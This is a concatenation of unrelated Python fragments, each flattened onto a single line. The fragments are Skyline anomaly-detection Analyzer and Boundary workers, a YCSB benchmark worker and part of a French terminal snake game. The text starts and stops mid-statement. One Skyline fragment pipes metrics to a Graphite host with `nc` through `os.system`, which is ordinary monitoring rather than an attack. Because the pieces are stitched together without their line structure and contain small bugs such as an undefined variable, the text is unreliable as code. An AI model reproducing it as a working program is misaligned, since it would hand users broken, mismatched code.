self.redis_conn.get(settings.FULL_NAMESPACE + settings.CANARY_METRIC) if raw_series is not None: unpacker = Unpacker(use_list = False) unpacker.feed(raw_series) timeseries = list(unpacker) time_human = (timeseries[-1][0] - timeseries[0][0]) / 3600 projected = 24 * (time() - now) / time_human logger.info('canary duration :: %.2f' % time_human) if settings.GRAPHITE_HOST != '': host = settings.GRAPHITE_HOST.replace('http://', '') system('echo skyline.analyzer.duration %.2f %s | nc -w 3 %s 2003' % (time_human, now, host)) system('echo skyline.analyzer.projected %.2f %s | nc -w 3 %s 2003' % (projected, now, host)) # Reset counters self.anomalous_metrics[:] = [] self.exceptions = Manager().dict() self.anomaly_breakdown = Manager().dict() # Sleep if it went too fast if time() - now < 5: logger.info('sleeping due to low run time...') sleep(10)
class Analyzer(Thread): def __init__(self, parent_pid): """ Initialize the Analyzer """ super(Analyzer, self).__init__() self.redis_conn = StrictRedis(unix_socket_path = settings.REDIS_SOCKET_PATH) self.daemon = True self.parent_pid = parent_pid self.current_pid = getpid() self.anomalous_metrics = Manager().list() self.exceptions_q = Queue() self.anomaly_breakdown_q = Queue() def check_if_parent_is_alive(self): """ Self explanatory """ try: kill(self.current_pid, 0) kill(self.parent_pid, 0) except: exit(0) def send_graphite_metric(self, name, value): if settings.GRAPHITE_HOST != '': sock = socket.socket() sock.connect((settings.CARBON_HOST.replace('http://', ''), settings.CARBON_PORT)) sock.sendall('%s %s %i\n' % (name, value, time())) sock.close() return True return False def spin_process(self, i, unique_metrics): """ Assign a bunch of metrics for a process to analyze. """ # Discover assigned metrics keys_per_processor = int(ceil(float(len(unique_metrics)) / float(settings.ANALYZER_PROCESSES))) if i == settings.ANALYZER_PROCESSES: assigned_max = len(unique_metrics) else: assigned_max = i * keys_per_processor assigned_min = assigned_max - keys_per_processor assigned_keys = range(assigned_min, assigned_max) # Compile assigned metrics assigned_metrics = [unique_metrics[index] for index in assigned_keys] # Check if this process is unnecessary if len(assigned_metrics) == 0: return # Multi get series raw_assigned = self.redis_conn.mget(assigned_metrics) # Make process-specific dicts exceptions = defaultdict(int) anomaly_breakdown = defaultdict(int) # Distill timeseries strings into lists for i, metric_name in enumerate(assigned_metrics): self.check_if_parent_is_alive() try: raw_series = raw_assigned[i] unpacker = Unpacker(use_list = False) unpacker.feed(raw_series) timeseries = list(unpacker) anomalous, ensemble, datapoint = run_selected_algorithm(timeseries, metric_name) # If it's anomalous, add it to list if anomalous: base_name = metric_name.replace(settings.FULL_NAMESPACE, '', 1) metric = [datapoint, base_name] self.anomalous_metrics.append(metric) # Get the anomaly breakdown - who returned True? for index, value in enumerate(ensemble): if value: algorithm = settings.ALGORITHMS[index] anomaly_breakdown[algorithm] += 1 # It could have been deleted by the Roomba except TypeError: exceptions['DeletedByRoomba'] += 1 except TooShort: exceptions['TooShort'] += 1 except Stale: exceptions['Stale'] += 1 except Boring: exceptions['Boring'] += 1 except: exceptions['Other'] += 1 logger.info(traceback.format_exc()) # Add values to the queue so the parent process can collate for key, value in anomaly_breakdown.items(): self.anomaly_breakdown_q.put((key, value)) for key, value in exceptions.items(): self.exceptions_q.put((key, value)) def run(self): """ Called when the process intializes. """ while 1: now = time() # Make sure Redis is up try: self.redis_conn.ping() except: logger.error('skyline can\'t connect to redis at socket path %s' % settings.REDIS_SOCKET_PATH) sleep(10) self.redis_conn = StrictRedis(unix_socket_path = settings.REDIS_SOCKET_PATH) continue # Discover unique metrics unique_metrics = list(self.redis_conn.smembers(settings.FULL_NAMESPACE + 'unique_metrics')) if len(unique_metrics) == 0: logger.info('no metrics in redis. try adding some - see README') sleep(10) continue # Spawn processes pids = [] for i in range(1, settings.ANALYZER_PROCESSES + 1): if i > len(unique_metrics): logger.info('WARNING: skyline is set for more cores than needed.') break p = Process(target=self.spin_process, args=(i, unique_metrics)) pids.append(p) p.start() # Send wait signal to zombie processes for p in pids: p.join() # Grab data from the queue and populate dictionaries exceptions = dict() anomaly_breakdown = dict() while 1: try: key, value = self.anomaly_breakdown_q.get_nowait() if key not in anomaly_breakdown.keys(): anomaly_breakdown[key] = value else: anomaly_breakdown[key] += value except Empty: break while 1: try: key, value = self.exceptions_q.get_nowait() if key not in exceptions.keys(): exceptions[key] = value else: exceptions[key] += value except Empty: break # Send alerts if settings.ENABLE_ALERTS: for alert in settings.ALERTS: for metric in self.anomalous_metrics: if alert[0] in metric[1]: cache_key = 'last_alert.%s.%s' % (alert[1], metric[1]) try: last_alert = self.redis_conn.get(cache_key) if not last_alert: self.redis_conn.setex(cache_key, alert[2], packb(metric[0])) trigger_alert(alert, metric) except Exception as e: logger.error("couldn't send alert: %s" % e) # Write anomalous_metrics to static webapp directory filename = path.abspath(path.join(path.dirname(__file__), '..', settings.ANOMALY_DUMP)) with open(filename, 'w') as fh: # Make it JSONP with a handle_data() function anomalous_metrics = list(self.anomalous_metrics) anomalous_metrics.sort(key=operator.itemgetter(1)) fh.write('handle_data(%s)' % anomalous_metrics) # Log progress logger.info('seconds to run :: %.2f' % (time() - now)) logger.info('total metrics :: %d' % len(unique_metrics)) logger.info('total analyzed :: %d' % (len(unique_metrics) - sum(exceptions.values()))) logger.info('total anomalies :: %d' % len(self.anomalous_metrics)) logger.info('exception stats :: %s' % exceptions) logger.info('anomaly breakdown :: %s' % anomaly_breakdown) # Log to Graphite self.send_graphite_metric('skyline.analyzer.run_time', '%.2f' % (time() - now)) self.send_graphite_metric('skyline.analyzer.total_analyzed', '%.2f' % (len(unique_metrics) - sum(exceptions.values()))) # Check canary metric raw_series = self.redis_conn.get(settings.FULL_NAMESPACE + settings.CANARY_METRIC) if raw_series is not None: unpacker = Unpacker(use_list = False) unpacker.feed(raw_series) timeseries = list(unpacker) time_human = (timeseries[-1][0] - timeseries[0][0]) / 3600 projected = 24 * (time() - now) / time_human logger.info('canary duration :: %.2f' % time_human) self.send_graphite_metric('skyline.analyzer.duration', '%.2f' % time_human) self.send_graphite_metric('skyline.analyzer.projected', '%.2f' % projected) # Reset counters self.anomalous_metrics[:] = [] # Sleep if it went too fast if time() - now < 5: logger.info('sleeping due to low run time...') sleep(10)
class YCSBWorker(object): def __init__(self, access_settings, remote, test, ycsb): self.workers = access_settings.workers self.remote = remote self.test = test self.timer = access_settings.time self.ycsb = ycsb self.shutdown_event = self.timer and Event() or None self.ycsb_result = Manager().dict({key: [] for key in ['Throughput', 'READ_95', 'UPDATE_95', 'INSERT_95', 'SCAN_95']}) self.ycsb_logfiles = Manager().list() self.task = self.ycsb_work def time_to_stop(self): return (self.shutdown_event is not None and self.shutdown_event.is_set()) def ycsb_work(self, mypid): flag = True log_file = '{}_{}.txt'.format(self.ycsb.log_path + self.ycsb.log_file, str(mypid)) self.ycsb_logfiles.append(log_file) self.run_cmd = self.test.create_load_cmd(action="run", mypid=mypid) self.run_cmd += ' -p exportfile={}'.format(log_file) try: while flag and not self.time_to_stop(): self.remote.ycsb_load_run(self.ycsb.path, self.run_cmd, log_path=self.ycsb.log_path, mypid=mypid) flag = False except Exception as e: raise YCSBException(' Error while running YCSB load' + e) def pattern(self, line): ttype, measure, value = map(str.strip, line.split(',')) key = '' if ttype == "[OVERALL]" and measure == "Throughput(ops/sec)": key = 'Throughput' elif ttype == "[READ]" and measure == "95thPercentileLatency(us)": key = 'READ_95' elif ttype == "[UPDATE]" and measure == "95thPercentileLatency(us)": key = 'UPDATE_95' elif ttype == "[INSERT]" and measure == "95thPercentileLatency(us)": key = 'INSERT_95' elif ttype == "[SCAN]" and measure == "95thPercentileLatency(us)": key = 'SCAN_95' else: return self.ycsb_result[key] += [round(float(value))] def parse_work(self, mypid): filename = self.ycsb_logfiles[mypid] with open(filename, "r") as txt: for line in txt: self.pattern(line) def run(self): processes = [Process(target=self.task, args=(x,)) for x in range(self.workers)] for p in processes: p.start() for p in processes: p.join() if p.exitcode: logger.interrupt('Worker finished with non-zero exit code') def parse(self): self.task = self.parse_work self.run() return np.sum(self.ycsb_result['Throughput']), \ np.mean(self.ycsb_result['READ_95']), \ np.mean(self.ycsb_result['UPDATE_95']), \ np.mean(self.ycsb_result['INSERT_95']), \ np.mean(self.ycsb_result['SCAN_95'])
print() system('setterm -cursor on') # Réafficher le curseur si on fait CTRL+C exit(0) snake_list = [] snake_direction = Manager().Value('ctypes.c_char_p', "right") ## Variable partagée avec l'autre processus snake_blocks = Manager().Value('i', 2) game_speed = Manager().Value('f', .5) posLargSnake = Manager().Value('i', 1) posLongSnake = Manager().Value('i', 1) snake_head = Manager().list() snake_head.append(1) snake_head.append(2) point_pos = Manager().list() score = Manager().Value('i', 0) game_over = Manager().Value('b', False) pause = Manager().Value('b', False) printed_pause = Manager().Value('b', True) touche = Manager().Value('i', 0) colored_space = Manager().Value('ctypes.c_char_p', colored(' ', 'grey', 'on_grey')) colored_snake_body = Manager().Value('ctypes.c_char_p', colored('x', 'green', 'on_green')) colored_snake_head = Manager().Value('ctypes.c_char_p', colored('x', 'white', 'on_white')) colored_point = Manager().Value('ctypes.c_char_p', colored('o', 'red', 'on_red')) signal.signal(signal.SIGINT, quit)
class Boundary(Thread): def __init__(self, parent_pid): """ Initialize the Boundary """ super(Boundary, self).__init__() self.redis_conn = StrictRedis(unix_socket_path=REDIS_SOCKET) self.daemon = True self.parent_pid = parent_pid self.current_pid = getpid() self.boundary_metrics = Manager().list() self.anomalous_metrics = Manager().list() self.exceptions_q = Queue() self.anomaly_breakdown_q = Queue() def check_if_parent_is_alive(self): """ Self explanatory """ try: kill(self.current_pid, 0) kill(self.parent_pid, 0) except: exit(0) def send_graphite_metric(self, name, value): if settings.GRAPHITE_HOST != '': sock = socket.socket() try: sock.connect((settings.GRAPHITE_HOST, settings.CARBON_PORT)) except socket.error: endpoint = '%s:%d' % (settings.GRAPHITE_HOST, settings.CARBON_PORT) logger.error('Cannot connect to Graphite at %s' % endpoint) return False sock.sendall('%s %s %i\n' % (name, value, time())) sock.close() return True return False def unique_noHash(self, seq): seen = set() return [x for x in seq if str(x) not in seen and not seen.add(str(x))] # This is to make a dump directory in /tmp if ENABLE_BOUNDARY_DEBUG is True # for dumping the metric timeseries data into for debugging purposes def mkdir_p(self, path): try: os.makedirs(path) return True except OSError as exc: # Python >2.5 if exc.errno == errno.EEXIST and os.path.isdir(path): pass else: raise def spin_process(self, i, boundary_metrics): """ Assign a bunch of metrics for a process to analyze. """ # Determine assigned metrics bp = settings.BOUNDARY_PROCESSES bm_range = len(boundary_metrics) keys_per_processor = int(ceil(float(bm_range) / float(bp))) if i == settings.BOUNDARY_PROCESSES: assigned_max = len(boundary_metrics) else: # This is a skyine bug, the original skyline code uses 1 as the # beginning position of the index, python indices begin with 0 # assigned_max = len(boundary_metrics) # This closes the etsy/skyline pull request opened by @languitar on 17 Jun 2014 # https://github.com/etsy/skyline/pull/94 Fix analyzer worker metric assignment assigned_max = min(len(boundary_metrics), i * keys_per_processor) assigned_min = (i - 1) * keys_per_processor assigned_keys = range(assigned_min, assigned_max) # Compile assigned metrics assigned_metrics_and_algos = [boundary_metrics[index] for index in assigned_keys] if ENABLE_BOUNDARY_DEBUG: logger.info('debug - printing assigned_metrics_and_algos') for assigned_metric_and_algo in assigned_metrics_and_algos: logger.info('debug - assigned_metric_and_algo - %s' % str(assigned_metric_and_algo)) # Compile assigned metrics assigned_metrics = [] for i in assigned_metrics_and_algos: assigned_metrics.append(i[0]) # unique unhashed things def unique_noHash(seq): seen = set() return [x for x in seq if str(x) not in seen and not seen.add(str(x))] unique_assigned_metrics = unique_noHash(assigned_metrics) if ENABLE_BOUNDARY_DEBUG: logger.info('debug - unique_assigned_metrics - %s' % str(unique_assigned_metrics)) logger.info('debug - printing unique_assigned_metrics:') for unique_assigned_metric in unique_assigned_metrics: logger.info('debug - unique_assigned_metric - %s' % str(unique_assigned_metric)) # Check if this process is unnecessary if len(unique_assigned_metrics) == 0: return # Multi get series try: raw_assigned = self.redis_conn.mget(unique_assigned_metrics) except: logger.error("failed to mget assigned_metrics from redis") return # Make process-specific dicts exceptions = defaultdict(int) anomaly_breakdown = defaultdict(int) # Reset boundary_algortims all_boundary_algorithms = [] for metric in BOUNDARY_METRICS: all_boundary_algorithms.append(metric[1]) # The unique algorithms that are being used boundary_algorithms = unique_noHash(all_boundary_algorithms) if ENABLE_BOUNDARY_DEBUG: logger.info('debug - boundary_algorithms - %s' % str(boundary_algorithms)) discover_run_metrics = [] # Distill metrics into a run list for i, metric_name, in enumerate(unique_assigned_metrics): self.check_if_parent_is_alive() try: if ENABLE_BOUNDARY_DEBUG: logger.info('debug - unpacking timeseries for %s - %s' % (metric_name, str(i))) raw_series = raw_assigned[i] unpacker = Unpacker(use_list=False) unpacker.feed(raw_series) timeseries = list(unpacker) except Exception as e: exceptions['Other'] += 1 logger.error("redis data error: " + traceback.format_exc()) logger.error("error: %e" % e) base_name = metric_name.replace(FULL_NAMESPACE, '', 1) # Determine the metrics BOUNDARY_METRICS metric tuple settings for metrick in BOUNDARY_METRICS: CHECK_MATCH_PATTERN = metrick[0] check_match_pattern = re.compile(CHECK_MATCH_PATTERN) pattern_match = check_match_pattern.match(base_name) metric_pattern_matched = False if pattern_match: metric_pattern_matched = True algo_pattern_matched = False for algo in boundary_algorithms: for metric in BOUNDARY_METRICS: CHECK_MATCH_PATTERN = metric[0] check_match_pattern = re.compile(CHECK_MATCH_PATTERN) pattern_match = check_match_pattern.match(base_name) if pattern_match: if ENABLE_BOUNDARY_DEBUG: logger.info("debug - metric and algo pattern MATCHED - " + metric[0] + " | " + base_name + " | " + str(metric[1])) metric_expiration_time = False metric_min_average = False metric_min_average_seconds = False metric_trigger = False algorithm = False algo_pattern_matched = True algorithm = metric[1] try: if metric[2]: metric_expiration_time = metric[2] except: metric_expiration_time = False try: if metric[3]: metric_min_average = metric[3] except: metric_min_average = False try: if metric[4]: metric_min_average_seconds = metric[4] except: metric_min_average_seconds = 1200 try: if metric[5]: metric_trigger = metric[5] except: metric_trigger = False try: if metric[6]: alert_threshold = metric[6] except: alert_threshold = False try: if metric[7]: metric_alerters = metric[7] except: metric_alerters = False if metric_pattern_matched and algo_pattern_matched: if ENABLE_BOUNDARY_DEBUG: logger.info('debug - added metric - %s, %s, %s, %s, %s, %s, %s, %s, %s' % (str(i), metric_name, str(metric_expiration_time), str(metric_min_average), str(metric_min_average_seconds), str(metric_trigger), str(alert_threshold), metric_alerters, algorithm)) discover_run_metrics.append([i, metric_name, metric_expiration_time, metric_min_average, metric_min_average_seconds, metric_trigger, alert_threshold, metric_alerters, algorithm]) if ENABLE_BOUNDARY_DEBUG: logger.info('debug - printing discover_run_metrics') for discover_run_metric in discover_run_metrics: logger.info('debug - discover_run_metrics - %s' % str(discover_run_metric)) logger.info('debug - build unique boundary metrics to analyze') # Determine the unique set of metrics to run run_metrics = unique_noHash(discover_run_metrics) if ENABLE_BOUNDARY_DEBUG: logger.info('debug - printing run_metrics') for run_metric in run_metrics: logger.info('debug - run_metrics - %s' % str(run_metric)) # Distill timeseries strings and submit to run_selected_algorithm for metric_and_algo in run_metrics: self.check_if_parent_is_alive() try: raw_assigned_id = metric_and_algo[0] metric_name = metric_and_algo[1] base_name = metric_name.replace(FULL_NAMESPACE, '', 1) metric_expiration_time = metric_and_algo[2] metric_min_average = metric_and_algo[3] metric_min_average_seconds = metric_and_algo[4] metric_trigger = metric_and_algo[5] alert_threshold = metric_and_algo[6] metric_alerters = metric_and_algo[7] algorithm = metric_and_algo[8] if ENABLE_BOUNDARY_DEBUG: logger.info('debug - unpacking timeseries for %s - %s' % (metric_name, str(raw_assigned_id))) raw_series = raw_assigned[metric_and_algo[0]] unpacker = Unpacker(use_list=False) unpacker.feed(raw_series) timeseries = list(unpacker) if ENABLE_BOUNDARY_DEBUG: logger.info('debug - unpacked OK - %s - %s' % (metric_name, str(raw_assigned_id))) autoaggregate = False autoaggregate_value = 0 # Determine if the namespace is to be aggregated if BOUNDARY_AUTOAGGRERATION: for autoaggregate_metric in BOUNDARY_AUTOAGGRERATION_METRICS: autoaggregate = False autoaggregate_value = 0 CHECK_MATCH_PATTERN = autoaggregate_metric[0] base_name = metric_name.replace(FULL_NAMESPACE, '', 1) check_match_pattern = re.compile(CHECK_MATCH_PATTERN) pattern_match = check_match_pattern.match(base_name) if pattern_match: autoaggregate = True autoaggregate_value = autoaggregate_metric[1] if ENABLE_BOUNDARY_DEBUG: logger.info('debug - BOUNDARY_AUTOAGGRERATION passed - %s - %s' % (metric_name, str(autoaggregate))) if ENABLE_BOUNDARY_DEBUG: logger.info( 'debug - analysing - %s, %s, %s, %s, %s, %s, %s, %s, %s, %s' % ( metric_name, str(metric_expiration_time), str(metric_min_average), str(metric_min_average_seconds), str(metric_trigger), str(alert_threshold), metric_alerters, autoaggregate, autoaggregate_value, algorithm) ) # Dump the the timeseries data to a file timeseries_dump_dir = "/tmp/skyline/boundary/" + algorithm self.mkdir_p(timeseries_dump_dir) timeseries_dump_file = timeseries_dump_dir + "/" + metric_name + ".json" with open(timeseries_dump_file, 'w+') as f: f.write(str(timeseries)) f.close() # Check if a metric has its own unique BOUNDARY_METRICS alert # tuple, this allows us to paint an entire metric namespace with # the same brush AND paint a unique metric or namespace with a # different brush or scapel has_unique_tuple = False run_tupple = False boundary_metric_tuple = (base_name, algorithm, metric_expiration_time, metric_min_average, metric_min_average_seconds, metric_trigger, alert_threshold, metric_alerters) wildcard_namespace = True for metric_tuple in BOUNDARY_METRICS: if not has_unique_tuple: CHECK_MATCH_PATTERN = metric_tuple[0] check_match_pattern = re.compile(CHECK_MATCH_PATTERN) pattern_match = check_match_pattern.match(base_name) if pattern_match: if metric_tuple[0] == base_name: wildcard_namespace = False if not has_unique_tuple: if boundary_metric_tuple == metric_tuple: has_unique_tuple = True run_tupple = True if ENABLE_BOUNDARY_DEBUG: logger.info('unique_tuple:') logger.info('boundary_metric_tuple: %s' % str(boundary_metric_tuple)) logger.info('metric_tuple: %s' % str(metric_tuple)) if not has_unique_tuple: if wildcard_namespace: if ENABLE_BOUNDARY_DEBUG: logger.info('wildcard_namespace:') logger.info('boundary_metric_tuple: %s' % str(boundary_metric_tuple)) run_tupple = True else: if ENABLE_BOUNDARY_DEBUG: logger.info('wildcard_namespace: BUT WOULD NOT RUN') logger.info('boundary_metric_tuple: %s' % str(boundary_metric_tuple)) if ENABLE_BOUNDARY_DEBUG: logger.info('WOULD RUN run_selected_algorithm = %s' % run_tupple) if run_tupple: # Submit the timeseries and settings to run_selected_algorithm anomalous, ensemble, datapoint, metric_name, metric_expiration_time, metric_min_average, metric_min_average_seconds, metric_trigger, alert_threshold, metric_alerters, algorithm = run_selected_algorithm( timeseries, metric_name, metric_expiration_time, metric_min_average, metric_min_average_seconds, metric_trigger, alert_threshold, metric_alerters, autoaggregate, autoaggregate_value, algorithm ) if ENABLE_BOUNDARY_DEBUG: logger.info('debug - analysed - %s' % (metric_name)) else: anomalous = False if ENABLE_BOUNDARY_DEBUG: logger.info('debug - more unique metric tuple not analysed - %s' % (metric_name)) # If it's anomalous, add it to list if anomalous: anomalous_metric = [datapoint, metric_name, metric_expiration_time, metric_min_average, metric_min_average_seconds, metric_trigger, alert_threshold, metric_alerters, algorithm] self.anomalous_metrics.append(anomalous_metric) # Get the anomaly breakdown - who returned True? for index, value in enumerate(ensemble): if value: anomaly_breakdown[algorithm] += 1 # It could have been deleted by the Roomba except TypeError: exceptions['DeletedByRoomba'] += 1 except TooShort: exceptions['TooShort'] += 1 except Stale: exceptions['Stale'] += 1 except Boring: exceptions['Boring'] += 1 except: exceptions['Other'] += 1 logger.info("exceptions['Other'] traceback follows:") logger.info(traceback.format_exc()) # Add values to the queue so the parent process can collate for key, value in anomaly_breakdown.items(): self.anomaly_breakdown_q.put((key, value)) for key, value in exceptions.items(): self.exceptions_q.put((key, value)) def run(self): """ Called when the process intializes. """ while 1: now = time() # Make sure Redis is up try: self.redis_conn.ping() except: logger.error('skyline can\'t connect to redis at socket path %s' % settings.REDIS_SOCKET_PATH) sleep(10) self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH) continue # Discover unique metrics unique_metrics = list(self.redis_conn.smembers(settings.FULL_NAMESPACE + 'unique_metrics')) if len(unique_metrics) == 0: logger.info('no metrics in redis. try adding some - see README') sleep(10) continue # Reset boundary_metrics boundary_metrics = [] # Build boundary metrics for metric_name in unique_metrics: for metric in BOUNDARY_METRICS: CHECK_MATCH_PATTERN = metric[0] check_match_pattern = re.compile(CHECK_MATCH_PATTERN) base_name = metric_name.replace(FULL_NAMESPACE, '', 1) pattern_match = check_match_pattern.match(base_name) if pattern_match: if ENABLE_BOUNDARY_DEBUG: logger.info("debug - boundary metric - pattern MATCHED - " + metric[0] + " | " + base_name) boundary_metrics.append([metric_name, metric[1]]) if ENABLE_BOUNDARY_DEBUG: logger.info("debug - boundary metrics - " + str(boundary_metrics)) if len(boundary_metrics) == 0: logger.info('no metrics in redis. try adding some - see README') sleep(10) continue # Spawn processes pids = [] for i in range(1, settings.BOUNDARY_PROCESSES + 1): if i > len(boundary_metrics): logger.info('WARNING: skyline boundary is set for more cores than needed.') break p = Process(target=self.spin_process, args=(i, boundary_metrics)) pids.append(p) p.start() # Send wait signal to zombie processes for p in pids: p.join() # Grab data from the queue and populate dictionaries exceptions = dict() anomaly_breakdown = dict() while 1: try: key, value = self.anomaly_breakdown_q.get_nowait() if key not in anomaly_breakdown.keys(): anomaly_breakdown[key] = value else: anomaly_breakdown[key] += value except Empty: break while 1: try: key, value = self.exceptions_q.get_nowait() if key not in exceptions.keys(): exceptions[key] = value else: exceptions[key] += value except Empty: break # Send alerts if settings.BOUNDARY_ENABLE_ALERTS: for anomalous_metric in self.anomalous_metrics: datapoint = str(anomalous_metric[0]) metric_name = anomalous_metric[1] base_name = metric_name.replace(FULL_NAMESPACE, '', 1) expiration_time = str(anomalous_metric[2]) metric_trigger = str(anomalous_metric[5]) alert_threshold = int(anomalous_metric[6]) metric_alerters = anomalous_metric[7] algorithm = anomalous_metric[8] if ENABLE_BOUNDARY_DEBUG: logger.info("debug - anomalous_metric - " + str(anomalous_metric)) # Determine how many times has the anomaly been seen if the # ALERT_THRESHOLD is set to > 1 and create a cache key in # redis to keep count so that alert_threshold can be honored if alert_threshold == 0: times_seen = 1 if ENABLE_BOUNDARY_DEBUG: logger.info("debug - alert_threshold - " + str(alert_threshold)) if alert_threshold == 1: times_seen = 1 if ENABLE_BOUNDARY_DEBUG: logger.info("debug - alert_threshold - " + str(alert_threshold)) if alert_threshold > 1: if ENABLE_BOUNDARY_DEBUG: logger.info("debug - alert_threshold - " + str(alert_threshold)) anomaly_cache_key_count_set = False anomaly_cache_key_expiration_time = (int(alert_threshold) + 1) * 60 anomaly_cache_key = 'anomaly_seen.%s.%s' % (algorithm, base_name) try: anomaly_cache_key_count = self.redis_conn.get(anomaly_cache_key) if not anomaly_cache_key_count: try: if ENABLE_BOUNDARY_DEBUG: logger.info("debug - redis no anomaly_cache_key - " + str(anomaly_cache_key)) times_seen = 1 if ENABLE_BOUNDARY_DEBUG: logger.info("debug - redis setex anomaly_cache_key - " + str(anomaly_cache_key)) self.redis_conn.setex(anomaly_cache_key, anomaly_cache_key_expiration_time, packb(int(times_seen))) logger.info('set anomaly seen key :: %s seen %s' % (anomaly_cache_key, str(times_seen))) except Exception as e: logger.error('redis setex failed :: %s' % str(anomaly_cache_key)) logger.error("couldn't set key: %s" % e) else: if ENABLE_BOUNDARY_DEBUG: logger.info("debug - redis anomaly_cache_key retrieved OK - " + str(anomaly_cache_key)) anomaly_cache_key_count_set = True except: if ENABLE_BOUNDARY_DEBUG: logger.info("debug - redis failed - anomaly_cache_key retrieval failed - " + str(anomaly_cache_key)) anomaly_cache_key_count_set = False if anomaly_cache_key_count_set: unpacker = Unpacker(use_list=False) unpacker.feed(anomaly_cache_key_count) raw_times_seen = list(unpacker) times_seen = int(raw_times_seen[0]) + 1 try: self.redis_conn.setex(anomaly_cache_key, anomaly_cache_key_expiration_time, packb(int(times_seen))) logger.info('set anomaly seen key :: %s seen %s' % (anomaly_cache_key, str(times_seen))) except: times_seen = 1 logger.error('set anomaly seen key failed :: %s seen %s' % (anomaly_cache_key, str(times_seen))) # Alert the alerters if times_seen > alert_threshold if times_seen >= alert_threshold: if ENABLE_BOUNDARY_DEBUG: logger.info("debug - times_seen %s is greater than or equal to alert_threshold %s" % (str(times_seen), str(alert_threshold))) for alerter in metric_alerters.split("|"): # Determine alerter limits send_alert = False alerts_sent = 0 if ENABLE_BOUNDARY_DEBUG: logger.info("debug - checking alerter - %s" % alerter) try: if ENABLE_BOUNDARY_DEBUG: logger.info("debug - determining alerter_expiration_time for settings") alerter_expiration_time_setting = settings.BOUNDARY_ALERTER_OPTS['alerter_expiration_time'][alerter] alerter_expiration_time = int(alerter_expiration_time_setting) if ENABLE_BOUNDARY_DEBUG: logger.info("debug - determined alerter_expiration_time from settings - %s" % str(alerter_expiration_time)) except: # Set an arbitrary expiry time if not set alerter_expiration_time = 160 if ENABLE_BOUNDARY_DEBUG: logger.info("debug - could not determine alerter_expiration_time from settings") try: if ENABLE_BOUNDARY_DEBUG: logger.info("debug - determining alerter_limit from settings") alerter_limit_setting = settings.BOUNDARY_ALERTER_OPTS['alerter_limit'][alerter] alerter_limit = int(alerter_limit_setting) alerter_limit_set = True if ENABLE_BOUNDARY_DEBUG: logger.info("debug - determined alerter_limit from settings - %s" % str(alerter_limit)) except: alerter_limit_set = False send_alert = True if ENABLE_BOUNDARY_DEBUG: logger.info("debug - could not determine alerter_limit from settings") # If the alerter_limit is set determine how many # alerts the alerter has sent if alerter_limit_set: alerter_sent_count_key = 'alerts_sent.%s' % (alerter) try: alerter_sent_count_key_data = self.redis_conn.get(alerter_sent_count_key) if not alerter_sent_count_key_data: if ENABLE_BOUNDARY_DEBUG: logger.info("debug - redis no alerter key, no alerts sent for - " + str(alerter_sent_count_key)) alerts_sent = 0 send_alert = True if ENABLE_BOUNDARY_DEBUG: logger.info("debug - alerts_sent set to %s" % str(alerts_sent)) logger.info("debug - send_alert set to %s" % str(sent_alert)) else: if ENABLE_BOUNDARY_DEBUG: logger.info("debug - redis alerter key retrieved, unpacking" + str(alerter_sent_count_key)) unpacker = Unpacker(use_list=False) unpacker.feed(alerter_sent_count_key_data) raw_alerts_sent = list(unpacker) alerts_sent = int(raw_alerts_sent[0]) if ENABLE_BOUNDARY_DEBUG: logger.info("debug - alerter %s alerts sent %s " % (str(alerter), str(alerts_sent))) except: logger.info("No key set - %s" % alerter_sent_count_key) alerts_sent = 0 send_alert = True if ENABLE_BOUNDARY_DEBUG: logger.info("debug - alerts_sent set to %s" % str(alerts_sent)) logger.info("debug - send_alert set to %s" % str(send_alert)) if alerts_sent < alerter_limit: send_alert = True if ENABLE_BOUNDARY_DEBUG: logger.info("debug - alerts_sent %s is less than alerter_limit %s" % (str(alerts_sent), str(alerter_limit))) logger.info("debug - send_alert set to %s" % str(send_alert)) # Send alert alerter_alert_sent = False if send_alert: cache_key = 'last_alert.boundary.%s.%s.%s' % (alerter, base_name, algorithm) if ENABLE_BOUNDARY_DEBUG: logger.info("debug - checking cache_key - %s" % cache_key) try: last_alert = self.redis_conn.get(cache_key) if not last_alert: try: self.redis_conn.setex(cache_key, int(anomalous_metric[2]), packb(int(anomalous_metric[0]))) if ENABLE_BOUNDARY_DEBUG: logger.info('debug - key setex OK - %s' % (cache_key)) trigger_alert(alerter, datapoint, base_name, expiration_time, metric_trigger, algorithm) logger.info('alert sent :: %s - %s - via %s - %s' % (base_name, datapoint, alerter, algorithm)) trigger_alert("syslog", datapoint, base_name, expiration_time, metric_trigger, algorithm) logger.info('alert sent :: %s - %s - via syslog - %s' % (base_name, datapoint, algorithm)) alerter_alert_sent = True except Exception as e: logger.error('alert failed :: %s - %s - via %s - %s' % (base_name, datapoint, alerter, algorithm)) logger.error("couldn't send alert: %s" % str(e)) trigger_alert("syslog", datapoint, base_name, expiration_time, metric_trigger, algorithm) else: if ENABLE_BOUNDARY_DEBUG: logger.info("debug - cache_key exists not alerting via %s for %s is less than alerter_limit %s" % (alerter, cache_key)) trigger_alert("syslog", datapoint, base_name, expiration_time, metric_trigger, algorithm) logger.info('alert sent :: %s - %s - via syslog - %s' % (base_name, datapoint, algorithm)) except: trigger_alert("syslog", datapoint, base_name, expiration_time, metric_trigger, algorithm) logger.info('alert sent :: %s - %s - via syslog - %s' % (base_name, datapoint, algorithm)) else: trigger_alert("syslog", datapoint, base_name, expiration_time, metric_trigger, algorithm) logger.info('alert sent :: %s - %s - via syslog - %s' % (base_name, datapoint, algorithm)) # Update the alerts sent for the alerter cache key, # to allow for alert limiting if alerter_alert_sent and alerter_limit_set: try: alerter_sent_count_key = 'alerts_sent.%s' % (alerter) new_alerts_sent = int(alerts_sent) + 1 self.redis_conn.setex(alerter_sent_count_key, alerter_expiration_time, packb(int(new_alerts_sent))) logger.info('set %s - %s' % (alerter_sent_count_key, str(new_alerts_sent))) except: logger.error('failed to set %s - %s' % (alerter_sent_count_key, str(new_alerts_sent))) else: # Always alert to syslog, even if alert_threshold is not # breached or if send_alert is not True trigger_alert("syslog", datapoint, base_name, expiration_time, metric_trigger, algorithm) logger.info('alert sent :: %s - %s - via syslog - %s' % (base_name, datapoint, algorithm)) # Write anomalous_metrics to static webapp directory if len(self.anomalous_metrics) > 0: filename = path.abspath(path.join(path.dirname(__file__), '..', settings.ANOMALY_DUMP)) with open(filename, 'w') as fh: # Make it JSONP with a handle_data() function anomalous_metrics = list(self.anomalous_metrics) anomalous_metrics.sort(key=operator.itemgetter(1)) fh.write('handle_data(%s)' % anomalous_metrics) # Log progress logger.info('seconds to run :: %.2f' % (time() - now)) logger.info('total metrics :: %d' % len(boundary_metrics)) logger.info('total analyzed :: %d' % 